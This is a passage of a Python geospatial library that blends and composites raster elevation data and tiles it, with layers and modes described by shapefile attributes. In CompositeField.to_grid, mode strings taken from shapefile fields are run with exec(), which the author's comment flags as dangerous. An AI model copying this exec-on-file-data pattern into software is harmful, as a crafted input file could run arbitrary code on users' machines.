self.ic = interp_coverage.InterpCoverage(shp_fn,subset=subset)
else:
assert shp_data is not None
self.shp_data=shp_data
self.shp_fn=None
self.ic = interp_coverage.InterpCoverage(regions_data=shp_data,subset=subset)
Field.__init__(self)
self.delegates = delegates
self.factory = factory
self.delegate_list = [None]*len(self.ic.regions)
def bounds(self):
raise Exception("For now, you have to specify the bounds when gridding a BlenderField")
def load_region(self,i):
r = self.ic.regions[i]
if self.delegates is not None:
d = self.delegates[r.items['name']]
else:
d = self.factory( r.items )
self.delegate_list[i] = d
def value(self,X):
X=np.asanyarray(X)
print("Calculating weights")
weights = self.ic.calc_weights(X)
total_weights = weights.sum(axis=-1)
vals = np.zeros(X.shape[:-1],np.float64)
vals[total_weights==0.0] = np.nan
# iterate over sources:
for src_i in range(len(self.delegate_list)):
print("Processing layer ",self.ic.regions[src_i].identifier())
src_i_weights = weights[...,src_i]
needed = (src_i_weights != 0.0)
if needed.sum() > 0:
if self.delegate_list[src_i] is None:
self.load_region(src_i) # lazy loading
src_vals = self.delegate_list[src_i].value( X[needed] )
vals[needed] += src_i_weights[needed] * src_vals
return vals
def value_on_edge(self,e):
""" Return the interpolated value for a given line segment"""
### UNTESTED
c = e.mean(axis=0) # Center of edge
weights = self.ic.calc_weights(c)
val = 0.0 # np.zeros(X.shape[:-1],np.float64)
# iterate over sources:
for src_i in range(len(self.delegate_list)):
# print "Processing layer ",self.ic.regions[src_i].identifier()
src_i_weight = weights[src_i]
if src_i_weight != 0.0:
if self.delegate_list[src_i] is None:
self.load_region(src_i)
src_val = self.delegate_list[src_i].value_on_edge( e )
val += src_i_weight * src_val
return val
def diff(self,X):
""" Calculate differences between datasets where they overlap:
When a point has two datasets, the first is subtracted from the second.
When there are more, they alternate - so with three, you get A-B+C
Not very useful, but fast...
"""
weights = self.ic.calc_weights(X)
vals = np.zeros(X.shape[:-1],np.float64)
used = (weights!=0.0)
n_sources = used.sum(axis=-1)
# We just care about how the sources differ - if there is only
# one source then don't even bother calculating it - set all weights
# to zero.
weights[(n_sources==1),:] = 0.0 #
# iterate over sources:
for src_i in range(len(self.delegates)):
src_i_weights = weights[...,src_i]
needed = (src_i_weights != 0.0)
src_vals = self.delegates[src_i].value( X[needed] )
vals[needed] = src_vals - vals[needed]
return vals
class MultiBlender(Field):
"""
A collection of BlenderFields, separated based on a priority
field in the sources shapefile.
"""
def __init__(self,shp_fn,factory=None,priority_field='priority',
buffer_field=None):
self.priority_field=priority_field
self.shp_fn=shp_fn
self.sources=wkb2shp.shp2geom(shp_fn)
if buffer_field is not None:
self.flatten_with_buffer(buffer_field)
super(MultiBlender,self).__init__()
# This will sort low to high
self.priorities=np.unique(self.sources[self.priority_field])
self.bfs=[]
for pri in self.priorities:
subset= np.nonzero( self.sources[self.priority_field]==pri )[0]
self.bfs.append( BlenderField(shp_data=self.sources,
factory=factory,subset=subset) )
# def to_grid(self,dx,dy,bounds):
def value(self,X):
X=np.asanyarray(X)
shape_orig=X.shape
Xlin=X.reshape( [-1,2] )
V=np.nan*np.ones( len(Xlin), 'f8' )
# go in reverse order, to grab data from highest priority
# fields first.
for bf in self.bfs[::-1]:
sel=np.isnan(V)
if np.all(~sel):
break
V[sel] = bf.value(Xlin[sel])
return V.reshape( shape_orig[:-1] )
def flatten_with_buffer(self,buffer_field='buffer'):
"""
Rather than pure stacking of the rasters by priority,
automatically create some buffers between the high
priority fields and lower priority, to get some
blending
"""
sources=self.sources.copy()
priorities=np.unique(self.sources[self.priority_field])
union_geom=None # track the union of all polygons so far
from shapely.ops import cascaded_union
# higher priority layers, after being shrunk by their
# respective buffer distances, are subtracted from lower layer polygons.
# each feature's geometry is updated with the higher priority layers
# subtracted out, and then contributes its own neg-buffered geometry
# to the running union
for pri in priorities[::-1]:
# if pri<100:
# import pdb
# pdb.set_trace()
sel_idxs = np.nonzero( sources['priority'] == pri )[0]
updated_geoms=[] # just removed higher priority chunks
slimmed_geoms=[] # to be included in running union
for sel_idx in sel_idxs:
sel_geom=sources['geom'][sel_idx]
if union_geom is not None:
print("Updating %d"%sel_idx)
# HERE: this can come up empty
vis_sel_geom = sources['geom'][sel_idx] = sel_geom.difference( union_geom )
else:
vis_sel_geom=sel_geom
if vis_sel_geom.area > 0.0:
buff=sources[buffer_field][sel_idx]
sel_geom_slim=sel_geom.buffer(-buff)
# print("Buffering by %f"%(-buff) )
slimmed_geoms.append( sel_geom_slim )
merged=cascaded_union(slimmed_geoms) # polygon or multipolygon
if union_geom is None:
union_geom=merged
else:
union_geom=merged.union(union_geom)
self.old_sources=self.sources
sources[self.priority_field]=0.0 # no more need for priorities
valid=np.array( [ (source['geom'].area > 0.0)
for source in sources ] )
invalid_count=np.sum(~valid)
if invalid_count:
print("MultiBlenderField: %d source polygons were totally obscured"%invalid_count)
self.sources=sources[valid]
class CompositeField(Field):
"""
In the same vein as BlenderField, but following the model of raster
editors like Photoshop or the Gimp.
Individual sources are treated as an ordered "stack" of layers.
Layers higher on the stack can overwrite the data provided by layers
lower on the stack.
A layer is typically defined by a raster data source and a polygon over
which it is valid.
Each layer's contribution to the final dataset is both a data value and
an alpha value. This allows for blending/feathering between layers.
The default "data_mode" is simply overlay. Other data modes like "min" or
"max" are possible.
The default "alpha_mode" is "valid()" which is essentially opaque where there's
valid data, and transparent where there isn't. A second common option would
probably be "feather(<distance>)", which would take the valid areas of the layer,
and feather <distance> in from the edges.
The sources, data_mode, alpha_mode details are taken from a shapefile.
Alternatively, if a factory is given, it should be callable and will take a single argument -
a dict with the attributes for each source. The factory should then return the corresponding
Field.
TODO: there are cases where the alpha is so small that roundoff can cause
artifacts. Should push these cases to nan.
TODO: currently holes must be filled manually or after the fact. Is there a clean
way to handle that? Maybe a fill data mode?
Guide
-----
Create a polygon shapefile, with fields:
+------------+-----------+
| priority   | numeric   |
+------------+-----------+
| data_mode  | string    |
+------------+-----------+
| alpha_mode | string    |
+------------+-----------+
These names match the defaults to the constructor. Note that there is no
reprojection support -- the code assumes that the shapefile and all source
data are already in the target projection. Some code also assumes that it
is a square projection.
.. image:: images/composite-shp-table.png
Each polygon in the shapefile refers to a source dataset and defines where
that dataset will be used.
.. image:: images/composite-shp.png
.. image:: images/composite-shp-zoom.png
Datasets are processed as layers, building up from the lowest priority
to the highest priority. Higher priority sources generally overwrite
lower priority source, but that can be controlled by specifying
`data_mode`. The default is `overlay()`, which simply overwrites
the lower priority data. Other common modes are
* `min()`: use the minimum value between this source and lower
priority data. This layer will only *deepen* areas.
* `max()`: use the maximum value between this source and lower
priority data. This layer will only *raise* areas.
* `fill(dist)`: fill in holes up to `dist` wide in this dataset
before proceeding.
Multiple steps can be chained with commas, as in `fill(5.0),min()`, which
would fill in holes smaller than 5 spatial units (e.g. m), and then take
the minimum of this dataset and the existing data from previous (lower
priority) layers.
Another example:
.. image:: images/dcc-original.png
.. image:: images/dcc-dredged.png
"""
projection=None
def __init__(self,shp_fn=None,factory=None,
priority_field='priority',
data_mode='data_mode',
alpha_mode='alpha_mode',
shp_data=None,
shp_query=None,
target_date=None):
self.shp_fn = shp_fn
if shp_fn is not None: # read from shapefile
self.sources,self.projection=wkb2shp.shp2geom(shp_fn,return_srs=True,query=shp_query)
else:
self.sources=shp_data
if target_date is not None:
selA=np.array([ isnat(d) or d<=target_date
for d in self.sources['start_date']] )
selB=np.array([ isnat(d) or d>target_date
for d in self.sources['end_date']] )
orig_count=len(self.sources)
self.sources=self.sources[selA&selB]
new_count=len(self.sources)
log.info("Date filter selected %s of %s sources"%(new_count,orig_count))
if data_mode is not None:
self.data_mode=self.sources[data_mode]
else:
self.data_mode=['overlay()']*len(self.sources)
if alpha_mode is not None:
self.alpha_mode=self.sources[alpha_mode]
else:
self.alpha_mode=['valid()']*len(self.sources)
# Impose default values on those:
for i in range(len(self.sources)):
if self.alpha_mode[i]=='':
self.alpha_mode[i]='valid()'
if self.data_mode[i]=='':
self.data_mode[i]='overlay()'
super(CompositeField,self).__init__()
self.factory = factory
self.delegate_list=[None]*len(self.sources)
self.src_priority=self.sources[priority_field]
self.priorities=np.unique(self.src_priority)
def bounds(self):
raise Exception("For now, you have to specify the bounds when gridding a BlenderField")
def load_source(self,i):
if self.delegate_list[i] is None:
self.delegate_list[i] = self.factory( self.sources[i] )
return self.delegate_list[i]
def to_grid(self,nx=None,ny=None,bounds=None,dx=None,dy=None,
mask_poly=None,stackup=False):
""" render the layers to a SimpleGrid tile.
nx,ny: number of pixels in respective dimensions
bounds: xxyy bounding rectangle.
dx,dy: size of pixels in respective dimensions.
mask_poly: a shapely polygon. only points inside this polygon
will be generated.
stackup: 'return': return a list of the layers involved in compositing
this tile.
'plot': make a figure showing the evolution of the layers as they're
stacked up.
"""
# boil the arguments down to dimensions
if bounds is None:
xmin,xmax,ymin,ymax = self.bounds()
else:
if len(bounds) == 2:
xmin,ymin = bounds[0]
xmax,ymax = bounds[1]
else:
xmin,xmax,ymin,ymax = bounds
if nx is None:
nx=1+int(np.round((xmax-xmin)/dx))
ny=1+int(np.round((ymax-ymin)/dy))
if stackup:
stack=[]
# in case it came in as 2x2
bounds=[xmin,xmax,ymin,ymax]
# allocate the blank starting canvas
result_F =np.ones((ny,nx),'f8')
result_F[:]=-999 # -999 so we don't get nan contamination
result_data=SimpleGrid(extents=bounds,F=result_F,projection=self.projection)
result_alpha=result_data.copy()
result_alpha.F[:]=0.0
# Which sources to use, and in what order?
box=geometry.box(bounds[0],bounds[2],bounds[1],bounds[3])
if mask_poly is not None:
box=box.intersection(mask_poly)
# Which sources are relevant?
relevant_srcs=np.nonzero( [ box.intersects(geom)
for geom in self.sources['geom'] ])[0]
# omit negative priorities
relevant_srcs=relevant_srcs[ self.src_priority[relevant_srcs]>=0 ]
# Starts with lowest, goes to highest
order = np.argsort(self.src_priority[relevant_srcs])
ordered_srcs=relevant_srcs[order]
# Used to use ndimage.distance_transform_bf.
# This appears to give equivalent results (at least for binary-valued
# inputs), and runs about 80x faster on a small-ish input.
dist_xform=ndimage.distance_transform_edt
for src_i in ordered_srcs:
log.info(self.sources['src_name'][src_i])
log.info(" data mode: %s alpha mode: %s"%(self.data_mode[src_i],
self.alpha_mode[src_i]))
source=self.load_source(src_i)
src_data = source.to_grid(bounds=bounds,dx=dx,dy=dy)
src_alpha= SimpleGrid(extents=src_data.extents,
F=np.ones(src_data.F.shape,'f8'))
src_geom=self.sources['geom'][src_i]
if mask_poly is not None:
src_geom=src_geom.intersection(mask_poly)
mask=src_alpha.polygon_mask(src_geom)
src_alpha.F[~mask] = 0.0
# Use nan's to mask data, rather than masked arrays.
# Convert as necessary here:
if isinstance(src_data.F,np.ma.masked_array):
src_data.F=src_data.F.filled(np.nan)
# create an alpha tile. depending on alpha_mode, this may draw on the lower data,
# the polygon and/or the data tile.
# modify the data tile according to the data mode - so if the data mode is
# overlay, do nothing. but if it's max, the resulting data tile is the max
# of itself and the lower data.
# composite the data tile, using its alpha to blend with lower data.
# the various operations
def min():
""" new data will only decrease values
"""
valid=result_alpha.F>0
src_data.F[valid]=np.minimum( src_data.F[valid],result_data.F[valid] )
def max():
""" new data will only increase values
"""
valid=result_alpha.F>0
src_data.F[valid]=np.maximum( src_data.F[valid],result_data.F[valid] )
def fill(dist):
"fill in small missing areas"
pixels=int(round(float(dist)/dx))
# for fill, it may be better to clip this to 1 pixel, rather than
# bail when pixels==0
if pixels>0:
niters=np.maximum( pixels//3, 2 )
src_data.fill_by_convolution(iterations=niters)
def blur(dist):
"smooth data channel with gaussian filter - this allows spreading beyond original poly!"
pixels=int(round(float(dist)/dx))
#import pdb
#pdb.set_trace()
Fzed=src_data.F.copy()
valid=np.isfinite(Fzed)
Fzed[~valid]=0.0
weights=ndimage.gaussian_filter(1.0*valid,pixels)
blurred=ndimage.gaussian_filter(Fzed,pixels)
blurred[weights<0.5]=np.nan
blurred[weights>=0.5] /= weights[weights>=0.5]
src_data.F=blurred
def diffuser():
self.diffuser(source,src_data,src_geom,result_data)
def ortho_diffuser(res,aniso=1e-5):
self.ortho_diffuser(res=res,aniso=aniso,source=source,
src_data=src_data,src_geom=src_geom,result_data=result_data)
def overlay():
pass
# alpha channel operations:
def valid():
# updates alpha channel to be zero where source data is missing.
data_missing=np.isnan(src_data.F)
src_alpha.F[data_missing]=0.0
def blur_alpha(dist):
"smooth alpha channel with gaussian filter - this allows spreading beyond original poly!"
pixels=int(round(float(dist)/dx))
if pixels>0:
src_alpha.F=ndimage.gaussian_filter(src_alpha.F,pixels)
def feather_in(dist):
"linear feathering within original poly"
pixels=int(round(float(dist)/dx))
if pixels>0:
Fsoft=dist_xform(src_alpha.F)
src_alpha.F = (Fsoft/pixels).clip(0,1)
def buffer(dist):
"buffer poly outwards (by pixels)"
# Could do this by erosion/dilation. but using
# distance is a bit more compact (maybe slower, tho)
pixels=int(round(float(dist)/dx))
if pixels>0:
# Like feather_out.
# Fsoft gets distance to a 1 pixel
Fsoft=dist_xform(1-src_alpha.F)
# is this right, or does it need a 1 in there?
src_alpha.F = (pixels-Fsoft).clip(0,1)
elif pixels<0:
pixels=-pixels
# Fsoft gets the distance to a zero pixel
Fsoft=dist_xform(src_alpha.F)
src_alpha.F = (Fsoft-pixels).clip(0,1)
feather=feather_in
def feather_out(dist):
pixels=int(round(float(dist)/dx))
if pixels>0:
Fsoft=dist_xform(1-src_alpha.F)
src_alpha.F = (1-Fsoft/pixels).clip(0,1)
# dangerous! executing code from a shapefile!
for mode in [self.data_mode[src_i],self.alpha_mode[src_i]]:
if mode is None or mode.strip() in ['',b'']: continue
# This is getting a SyntaxError when using python 2.
exec(mode) # used to be eval.
data_missing=np.isnan(src_data.F)
src_alpha.F[data_missing]=0.0
cleaned=src_data.F.copy()
cleaned[data_missing]=-999 # avoid nan contamination.
assert np.allclose( result_data.extents, src_data.extents )
assert np.all( result_data.F.shape==src_data.F.shape )
# 2018-12-06: this is how it used to work, but this is problematic
# when result_alpha is < 1.
# result_data.F = result_data.F *(1-src_alpha.F) + cleaned*src_alpha.F
# where result_alpha=1.0, then we want to blend with src_alpha and 1-src_alpha.
# if result_alpha=0.0, then we take src wholesale, and carry its alpha through.
#
total_alpha=result_alpha.F*(1-src_alpha.F) + src_alpha.F
result_data.F = result_data.F * result_alpha.F *(1-src_alpha.F) + cleaned*src_alpha.F
# to avoid contracting data towards zero, have to normalize data by the total alpha.
valid=total_alpha>1e-10 # avoid #DIVZERO
result_data.F[valid] /= total_alpha[valid]
result_alpha.F = total_alpha
if stackup:
stack.append( (self.sources['src_name'][src_i],
result_data.copy(),
src_alpha.copy() ) )
# fudge it a bit, and allow semi-transparent data back out, but
# at least nan out the totally transparent stuff.
result_data.F[ result_alpha.F==0 ] = np.nan
if stackup=='return':
return result_data,stack
elif stackup=='plot':
self.plot_stackup(result_data,stack)
return result_data
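# Usage sketch (hedged): composite several sources described by a polygon
# shapefile; 'sources.shp', the 'src_name' attribute and the bounds are
# hypothetical, and the factory maps each shapefile record to a Field.
#
#   def factory(attrs):
#       return GdalGrid(attrs['src_name'])
#   comp = CompositeField('sources.shp', factory=factory)
#   dem = comp.to_grid(bounds=[500000, 502000, 4150000, 4152000], dx=2.0, dy=2.0)
#   dem.write_gdal('composite.tif')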
def ortho_diffuser(self,res,aniso,source,src_data,src_geom,result_data):
"""
Strongly anisotropic, curvilinear interpolation.
"""
from . import interp_orthogonal
oink=interp_orthogonal.OrthoInterpolator(region=src_geom,
background_field=result_data,
anisotropy=aniso,
nom_res=res)
fld=oink.field()
rast=fld.to_grid(bounds=result_data.bounds(),
dx=result_data.dx,dy=result_data.dy)
src_data.F[:,:]=rast.F
def diffuser(self,src,src_data,src_geom,result_data):
"""
src: the source for the layer. Ignored unless it's an XYZField
in which case the point samples are included.
src_data: where the diffused field will be saved
src_geom: polygon to work in
result_data: the stackup result from previous layers
"""
from scipy import sparse
from ..grid import triangulate_hole,quad_laplacian, unstructured_grid
from . import linestring_utils
dx=3*src_data.dx # rough guess
curve=linestring_utils.resample_linearring(np.array(src_geom.exterior),
dx,closed_ring=1)
g=unstructured_grid.UnstructuredGrid()
nodes,edges=g.add_linestring(curve,closed=True)
g=triangulate_hole.triangulate_hole(g,nodes=nodes,hole_rigidity='all',method='rebay')
bnodes=g.boundary_cycle()
bvals=result_data(g.nodes['x'][bnodes])
nd=quad_laplacian.NodeDiscretization(g)
dirich={ n:val
for n,val in zip(bnodes,bvals) }
if isinstance(src,XYZField):
for xy,z in zip(src.X,src.F):
c=g.select_cells_nearest(xy,inside=True)
if c is None: continue
n=g.select_nodes_nearest(xy)
dirich[n]=z
M,b=nd.construct_matrix(op='laplacian',dirichlet_nodes=dirich)
diffed=sparse.linalg.spsolve(M.tocsr(),b)
fld=XYZField(X=g.nodes['x'],F=diffed)
fld._tri=g.mpl_triangulation()
rast=fld.to_grid(bounds=result_data.bounds(),
dx=result_data.dx,dy=result_data.dy)
src_data.F[:,:]=rast.F
return rast
def plot_stackup(self,result_data,stack,num=None,z_factor=5.,cmap='jet'):
plt.figure(num=num).clf()
nrows=ncols=np.sqrt(len(stack))
nrows=int(np.ceil(nrows))
ncols=int(np.floor(ncols))
if nrows*ncols<len(stack): ncols+=1
fig,axs=plt.subplots(nrows,ncols,num=num,squeeze=False)
for ax,(name,data,alpha) in zip( axs.ravel(), stack ):
data.plot(ax=ax,vmin=0,vmax=3.5,cmap=cmap)
data.plot_hillshade(ax=ax,z_factor=z_factor)
ax.axis('off')
ax.set_title(name)
for ax in axs.ravel()[len(stack):]:
ax.axis('off')
fig.subplots_adjust(left=0,right=1,top=0.95,bottom=0,hspace=0.08)
# fig.
return fig
class MultiRasterField(Field):
""" Given a collection of raster files at various resolutions and with possibly overlapping
extents, manage a field which picks from the highest resolution raster for any given point.
Assumes that any point of interest is covered by at least one field (though there may be slower support
coming for some sort of nearest valid usage).
There is no blending for point queries! If two fields cover the same spot, the value taken from the
higher resolution field will be returned.
Basic bilinear interpolation will be utilized for point queries.
Edge queries will resample the edge at the resolution of the highest-resolution datasource, and then
proceed with those point queries.
Cell/region queries will have to wait for another day.
Some effort is made to keep only the most recently used rasters in memory, since it is not feasible
to load all rasters at one time. To this end, it is most efficient for successive queries to have some
spatial locality.
"""
# If finite, any point sample greater than this value will be clamped to this value
clip_max = np.inf
# Values below this will be interpreted as missing data
min_valid = None
order = 1 # interpolation order
# After clipping, this value will be added to the result.
# probably shouldn't use this - domain.py takes care of adding in the bathymetry offset
# and reversing the sign (so everything becomes positive)
offset = 0.0 # BEWARE!!! read the comment.
# any: raise an exception if any raster_file_pattern fails to find any
# matches
# all: raise an exception if all patterns come up empty
# False: silently proceed with no matches.
error_on_null_input='any' # 'all', or False
def __init__(self,raster_file_patterns,**kwargs):
self.__dict__.update(kwargs)
Field.__init__(self)
raster_files = []
for patt in raster_file_patterns:
if isinstance(patt,tuple):
patt,pri=patt
else:
pri=0 # default priority
matches=glob.glob(patt)
if len(matches)==0 and self.error_on_null_input=='any':
raise Exception("Pattern '%s' got no matches"%patt)
raster_files += [ (m,pri) for m in matches]
if len(raster_files)==0 and self.error_on_null_input=='all':
raise Exception("No patterns got matches")
self.raster_files = raster_files
self.prepare()
def bounds(self):
""" Aggregate bounds """
all_extents=self.sources['extent']
return [ all_extents[:,0].min(),
all_extents[:,1].max(),
all_extents[:,2].min(),
all_extents[:,3].max() ]
def prepare(self):
# find extents and resolution of each dataset:
sources=np.zeros( len(self.raster_files),
dtype=[ ('field','O'),
('filename','O'),
('extent','f8',4),
('resolution','f8'),
('resx','f8'),
('resy','f8'),
('order','f8'),
('last_used','i4') ] )
for fi,(f,pri) in enumerate(self.raster_files):
extent,resolution = GdalGrid.metadata(f)
sources['extent'][fi] = extent
sources['resolution'][fi] = max(resolution[0],resolution[1])
sources['resx'][fi] = resolution[0]
sources['resy'][fi] = resolution[1]
# negate so that higher priority sorts to the beginning
sources['order'][fi] = -pri
sources['field'][fi]=None
sources['filename'][fi]=f
sources['last_used'][fi]=-1
self.sources = sources
# -1 means the source isn't loaded. non-negative means it was last used when serial
# was that value. overflow danger...
self.build_index()
def polygon_mask(self,poly,crop=True,return_values=False):
"""
Mimic SimpleGrid.polygon_mask
Requires return_values==True, since a bitmask doesn't make
sense over a stack of layers.
return_values: must be True, and will
return just the values of F that fall inside poly.
"""
assert crop==True,"MultiRasterField only implements crop=True behavior"
assert return_values==True,"MultiRasterField only makes sense for return_values=True"
xyxy=poly.bounds
xxyy=[xyxy[0], xyxy[2], xyxy[1], xyxy[3]]
tile=self.extract_tile(xxyy)
return tile.polygon_mask(poly,crop=False,return_values=True)
# Thin wrapper to make a multiraster field look like one giant high resolution
# raster.
@property
def dx(self):
return np.abs(self.sources['resx']).min()
@property
def dy(self):
# many files report negative dy!
return np.abs(self.sources['resy']).min()
def crop(self,rect=None):
return self.to_grid(bounds=rect)
def build_index(self):
# Build a basic index that will return the overlapping dataset for a given point
# these are x,x,y,y
tuples = [(i,extent,None)
for i,extent in enumerate(self.sources['extent'])]
self.index = RectIndex(tuples,interleaved=False)
def report(self):
""" Short text representation of the layers found and their resolutions
"""
print("Raster sources:")
print(" Idx Order Res File")
for fi,rec in enumerate(self.sources):
print("%4d %4.1f %6.1f: %s"%(fi,
rec['order'],
rec['resolution'],
rec['filename']))
# TODO:
# For large sources rasters, replace them with a list of tiles, so we can load
# and cache smaller tiles.
max_count = 20
open_count = 0
serial = 0
def source(self,i):
""" LRU based cache of the datasets
"""
if self.sources['field'][i] is None:
if self.open_count >= self.max_count:
# Have to choose someone to close.
current = np.nonzero(self.sources['last_used']>=0)[0]
victim = current[ np.argmin( self.sources['last_used'][current] ) ]
# print "Will evict source %d"%victim
self.sources['last_used'][victim] = -1
self.sources['field'][victim] = None
self.open_count -= 1
# open the new guy:
self.sources['field'][i] = src = GdalGrid(self.sources['filename'][i])
# Need to treat this here, since otherwise those values may propagate
# in interpolation and then it will be hard to detect them.
src.F[ src.F < self.min_valid ] = np.nan
self.open_count += 1
self.serial += 1
self.sources['last_used'][i] = self.serial
return self.sources['field'][i]
def value_on_point(self,xy):
hits=self.ordered_hits(xy[xxyy])
if len(hits) == 0:
return np.nan
v = np.nan
for hit in hits:
src = self.source(hit)
# Here we should be asking for some kind of basic interpolation
v = src.interpolate( np.array([xy]), interpolation='linear' )[0]
if np.isnan(v):
continue
if v > self.clip_max:
v = self.clip_max
return v
# print("Bad sample at point ",xy)
return v
def value(self,X):
""" X must be shaped (...,2)
"""
X = np.array(X)
orig_shape = X.shape
X = X.reshape((-1,2))
newF = np.zeros( X.shape[0],np.float64 )
for i in range(X.shape[0]):
if i > 0 and i % 2000 == 0:
print("%d/%d"%(i,X.shape[0]))
newF[i] = self.value_on_point( X[i] )
newF = newF.reshape(orig_shape[:-1])
if newF.ndim == 0:
return float(newF)
else:
return newF
def value_on_edge(self,e,samples=None):
"""
Subsample the edge, using an interval based on the highest resolution overlapping
dataset. Average and return...
"""
pmin = e.min(axis=0)
pmax = e.max(axis=0)
hits=self.ordered_hits( [pmin[0],pmax[0],pmin[1],pmax[1]] )
if len(hits) == 0:
return np.nan
res = self.sources['resolution'][hits].min()
samples = int( np.ceil( norm(e[0] - e[1])/res) )
x=np.linspace(e[0,0],e[1,0],samples)
y=np.linspace(e[0,1],e[1,1],samples)
X = np.array([x,y]).transpose()
# old way - about 1.3ms per edge over 100 edges
# return nanmean(self.value(X))
# inlining -
# in order of resolution, query all the points at once from each field.
edgeF = np.nan*np.ones( X.shape[0],np.float64 )
for hit in hits:
missing = np.isnan(edgeF)
# now redundant with edit of src.F
#if self.min_valid is not None:
# missing = missing | (edgeF<self.min_valid)
src = self.source(hit)
# for the moment, keep the nearest interpolation
edgeF[missing] = src.interpolate( X[missing],interpolation='linear' )
if np.all(np.isfinite(edgeF)):
break
edgeF = np.clip(edgeF,-np.inf,self.clip_max) # ??
return np.nanmean(edgeF)
def ordered_hits(self,xxyy):
hits = self.index.intersection( xxyy )
if isinstance(hits, types.GeneratorType):
# so translate that into a list like we used to get.
hits = list(hits)
hits = np.array(hits)
if len(hits) == 0:
return []
# include filename here to resolve ties, avoiding the fallback behavior which
# may error out when comparing None
hits = hits[ np.argsort( self.sources[hits], order=('order','resolution','filename')) ]
return hits
def extract_tile(self,xxyy=None,res=None):
""" Create the requested tile from merging the sources. Resolution defaults to
resolution of the highest resolution source that falls inside the requested region
"""
return self.to_grid(bounds=xxyy,dx=res,dy=res)
def to_grid(self,nx=None,ny=None,interp='linear',bounds=None,dx=None,dy=None,valuator='value'):
"""
Extract data onto a regular grid. Interpolation order follows self.order (0 for nearest neighbor, 1 for linear) via ndimage.map_coordinates.
"""
# This used to be extract_tile, but the interface of to_grid is broader, so better
# to have extract_tile be a special case of to_grid.
xxyy=bounds
if xxyy is None:
xxyy=self.bounds()
xxyy=as_xxyy(xxyy)
hits = self.ordered_hits(xxyy)
if not len(hits):
# this can happen esp. when generating tiles for a larger dataset.
log.warning("to_grid: no datasets overlap, will return all nan")
if dx is None or dy is None:
raise Exception("No hits, and dx/dy not specified so resolution is unknown")
if dx is None:
dx=self.sources['resolution'][hits].min()
if dy is None:
dy=self.sources['resolution'][hits].min()
# half-pixel alignment-
# field.SimpleGrid expects extents which go to centers of pixels.
# x and y are inclusive of the end pixels (so for exactly abutting rects, there will be 1 pixel
# of overlap)
x=np.arange( xxyy[0],xxyy[1]+dx,dx)
y=np.arange( xxyy[2],xxyy[3]+dy,dy)
targetF = np.nan*np.zeros( (len(y),len(x)), np.float64)
pix_extents = [x[0],x[-1], y[0],y[-1] ]
target = SimpleGrid(extents=pix_extents,F=targetF)
# iterate over overlapping DEMs until we've filled in all the holes
# might want some feature where coarse data are only input at their respective
# cell centers, and then everything is blended,
# or maybe that as dx increases, we allow a certain amount of blending first
# the idea being that if there's a 5m hole in some lidar, it's better to blend the
# lidar than to query a 100m dataset.
# extend the extents to consider width of pixels (this at least makes the output
# register with the inputs)
for hit in hits:
src = self.source(hit)
src_x,src_y = src.xy()
src_dx,src_dy = src.delta()
# maps cols in the destination to cols in this source
# map_coordinates wants decimal array indices
# x has the utm easting for each column to extract
# x-src_x: easting relative to start of src tile
dec_x = (x-src_x[0]) / src_dx
dec_y = (y-src_y[0]) / src_dy
if self.order==0:
dec_x = np.floor( (dec_x+0.5) )
dec_y = np.floor( (dec_y+0.5) )
# what range of the target array falls within this tile
col_range = np.nonzero( (dec_x>=0) & (dec_x <= len(src_x)-1))[0]
if len(col_range):
col_range = col_range[ [0,-1]]
else:
continue
row_range = np.nonzero( (dec_y>=0) & (dec_y <= len(src_y)-1))[0]
if len(row_range):
row_range=row_range[ [0,-1]]
else:
continue
col_slice = slice(col_range[0],col_range[1]+1)
row_slice = slice(row_range[0],row_range[1]+1)
dec_x = dec_x[ col_slice ]
dec_y = dec_y[ row_slice ]
C,R = np.meshgrid( dec_x,dec_y )
newF = ndimage.map_coordinates(src.F, [R,C],order=self.order)
# only update missing values
missing = np.isnan(target.F[ row_slice,col_slice ])
# Now redundant with updating src.F above
# if self.min_valid is not None:
# # Also ignore out-of-bounds values from newF
# missing = missing & (newF>=self.min_valid)
target.F[ row_slice,col_slice ][missing] = newF[missing]
return target
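# Usage sketch (hedged): query points and tiles over a collection of rasters;
# the glob patterns and coordinates are hypothetical. A (pattern, priority)
# tuple controls precedence; the negative priority here demotes the coarse DEM.
#
#   mrf = MultiRasterField(["lidar/*.tif", ("coarse_dem/*.tif", -1)])
#   z = mrf.value([500500.0, 4150500.0])                   # single point query
#   tile = mrf.extract_tile([500000, 502000, 4150000, 4152000], res=2.0)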
class FunctionField(Field):
""" wraps an arbitrary function
function must take one argument, X, which has
shape [...,2]
"""
def __init__(self,func):
self.func = func
def value(self,X):
X=np.asanyarray(X)
return self.func(X)
# used to be in its own file
class TileMaker(object):
""" Given a field, create gridded tiles of the field, including some options for blending, filling,
cropping, etc.
"""
tx = 1000 # physical size, x, for a tile
ty = 1000 # physical size, y, for a tile
dx = 2 # pixel width
dy = 2 # pixel height
pad = 50 # physical distance to pad tiles in each of 4 directions
fill_iterations = 10
smoothing_iterations = 5
force = False # overwrite existing output files
output_dir = "."
filename_fmt = "%(left).0f-%(bottom).0f.tif"
quantize=True # whether to quantize bounds to tx
# A function(SimpleGrid,**kw) => SimpleGrid
# If set, this is called after rendering each tile, but before the tile
# is unpadded. see code below for the keywords supplied.
post_render=None
def __init__(self,f,**kwargs):
""" f: the field to be gridded
"""
self.f = f
set_keywords(self,kwargs)
if not os.path.exists(self.output_dir):
os.mkdir(self.output_dir)
def tile(self,xmin=None,ymin=None,xmax=None,ymax=None):
self.tile_fns=[]
if (xmin is None) or (xmax is None) or (ymin is None) or (ymax is None):
# some fields don't know their bounds, so hold off calling
# this unless we have to.
bounds=self.f.bounds()
if xmin is None: xmin=bounds[0]
if xmax is None: xmax=bounds[1]
if ymin is None: ymin=bounds[2]
if ymax is None: ymax=bounds[3]
if self.quantize:
xmin=self.tx*np.floor(xmin/self.tx)
xmax=self.tx*np.ceil( xmax/self.tx)
ymin=self.ty*np.floor(ymin/self.ty)
ymax=self.ty*np.ceil( ymax/self.ty)
nx = int(np.ceil((xmax - xmin)/self.tx))
ny = int(np.ceil((ymax - ymin)/self.ty))
print("Tiles: %d x %d"%(nx,ny))
for xi in range(nx):
for yi in range(ny):
ll = [xmin+xi*self.tx,
ymin+yi*self.ty]
ur = [ll[0]+self.tx,
ll[1]+self.ty]
# populate some local variables for giving to the filename format
left=ll[0]
right=ll[0]+self.tx
bottom=ll[1]
top = ll[1]+self.ty
dx = self.dx
dy = self.dy
bounds = np.array([left,right,bottom,top])
print("Tile ",bounds)
output_fn = os.path.join(self.output_dir,self.filename_fmt%locals())
self.tile_fns.append(output_fn)
print("Looking for output file: %s"%output_fn)
